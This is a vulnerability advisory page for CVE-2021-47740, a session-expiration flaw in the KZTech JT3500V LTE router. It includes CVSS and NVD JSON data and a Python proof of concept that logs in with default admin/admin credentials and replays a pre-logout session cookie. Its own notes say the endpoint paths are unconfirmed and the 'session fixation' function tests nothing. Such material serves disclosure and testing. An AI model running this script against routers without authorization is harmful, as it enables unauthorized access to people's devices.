Security Vulnerability Report
CVE-2021-47740 CVSS 7.5 HIGH

CVE-2021-47740

Published: 2025-12-31 19:15:42
Last Modified: 2026-04-15 00:35:42

Description

KZTech JT3500V 4G LTE CPE 2.0.1 contains a session management vulnerability that allows attackers to reuse old session credentials without proper expiration. Attackers can exploit the weak session handling to maintain unauthorized access and potentially compromise device authentication mechanisms.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

KZTech JT3500V 4G LTE CPE firmware version <= 2.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
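#!/usr/bin/env python3
"""
CVE-2021-47740 - KZTech JT3500V insufficient session expiration check.

Logs in to the CPE web interface, logs out, then replays the pre-logout
session cookie against a protected page. A unit that invalidates sessions
server-side on logout must reject the replayed cookie.

NOTE(review): the endpoint paths (/login, /logout, /admin/settings), the form
field names and the credentials below are taken as-is from this listing and
are not confirmed against the device firmware; confirm them against the unit
under test before relying on a result.
"""

import requests
import sys

TARGET_IP = "192.168.1.1"  # Default CPE IP
TARGET_URL = f"http://{TARGET_IP}"  # plain HTTP: credentials and cookie travel in cleartext

_PROTECTED_PATH = "/admin/settings"
_REQUEST_TIMEOUT = 5  # seconds, same value for every request


def _protected_status(cookies):
    """Return the HTTP status of the protected page for the given cookies.

    Redirects are not followed: a device that answers a rejected session with
    a redirect to its login page would otherwise be reported as 200.
    """
    probe = requests.Session()
    probe.cookies.update(cookies)
    response = probe.get(
        f"{TARGET_URL}{_PROTECTED_PATH}",
        timeout=_REQUEST_TIMEOUT,
        allow_redirects=False,
    )
    return response.status_code


def check_session_management():
    """
    Check whether a session cookie is still accepted after logout.

    Two control requests run before the logout so that the final verdict
    means something: the protected page must be refused without a cookie and
    served with the fresh one. If either control fails, the result is
    inconclusive rather than a verdict.

    Returns:
        True  - the pre-logout cookie was still accepted after logout.
        False - the cookie was rejected after logout.
        None  - connection error, or the controls could not be established.
    """
    session = requests.Session()

    login_data = {
        "username": "admin",
        "password": "admin",  # Default credentials
    }

    try:
        # Step 1: Normal login
        response = session.post(
            f"{TARGET_URL}/login", data=login_data, timeout=_REQUEST_TIMEOUT
        )
        print(f"[+] Login attempt: Status {response.status_code}")

        session_cookie = session.cookies.get_dict()
        if not session_cookie:
            # Without a cookie there is nothing to replay; the original code
            # would have reported a verdict here regardless.
            print("[-] INCONCLUSIVE: login did not set any cookie", file=sys.stderr)
            return None
        # Cookie names only: the value is a live credential and must not end
        # up in terminal scrollback or captured logs.
        print(f"[+] Session cookie obtained (names only): {sorted(session_cookie)}")

        # Control A: the page must actually be access-controlled.
        if _protected_status({}) == 200:
            print(
                "[-] INCONCLUSIVE: protected page is served without a session",
                file=sys.stderr,
            )
            return None

        # Control B: the fresh cookie must grant access before logout,
        # otherwise the login failed or the path is wrong.
        if _protected_status(session_cookie) != 200:
            print(
                "[-] INCONCLUSIVE: session cookie does not grant access before logout",
                file=sys.stderr,
            )
            return None

        # Step 2: Logout
        logout_response = session.post(
            f"{TARGET_URL}/logout", timeout=_REQUEST_TIMEOUT
        )
        print(f"[+] Logout attempt: Status {logout_response.status_code}")

        # Step 3: Replay the cookie captured before logout. The copy taken
        # above is used because logout may clear the client-side jar.
        if _protected_status(session_cookie) == 200:
            print("[!] VULNERABLE: Session cookie still valid after logout!")
            print("[+] Attacker can maintain unauthorized access")
            return True

        print("[-] NOT VULNERABLE: Session properly invalidated")
        return False

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}", file=sys.stderr)
        return None


def exploit_session_fixation():
    """
    Illustrative narrative only; this function verifies nothing.

    It fetches the landing page, prints whatever pre-authentication cookie
    the device set, and then prints two fixed lines. No victim login is
    observed and no access is checked, so its output is not evidence of any
    weakness. The advisory data on this page lists CWE-613 (insufficient
    session expiration); session fixation is a separate weakness that this
    listing does not establish for the device. The entry point below does
    not call this function.

    Raises:
        requests.exceptions.RequestException: if the landing page request
            fails; it is not caught here.
    """
    attacker_session = requests.Session()

    # Pre-authentication request; any cookie set here carries no privileges yet.
    initial_response = attacker_session.get(f"{TARGET_URL}/", timeout=5)
    attacker_cookie = attacker_session.cookies.get_dict()
    print(f"[+] Attacker sets known session: {attacker_cookie}")

    # The two lines below describe a scenario; nothing has been tested.
    print("[+] Victim authenticates with attacker-provided session")
    print("[+] Attacker reuses session to gain access")


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2021-47740 - KZTech JT3500V Session Management PoC")
    print("=" * 60)
    check_session_management()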

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47740", "sourceIdentifier": "[email protected]", "published": "2025-12-31T19:15:42.103", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "KZTech JT3500V 4G LTE CPE 2.0.1 contains a session management vulnerability that allows attackers to reuse old session credentials without proper expiration. Attackers can exploit the weak session handling to maintain unauthorized access and potentially compromise device authentication mechanisms."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": 
"NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-613"}]}], "references": [{"url": "http://www.kzbtech.com/", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/198471", "source": "[email protected]"}, {"url": "https://neotel.mk/", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/161892/", "source": "[email protected]"}, {"url": "https://www.jatontech.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/kztech-jtv-g-lte-cpe-insufficient-session-expiration-vulnerability", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5646.php", "source": "[email protected]"}]}}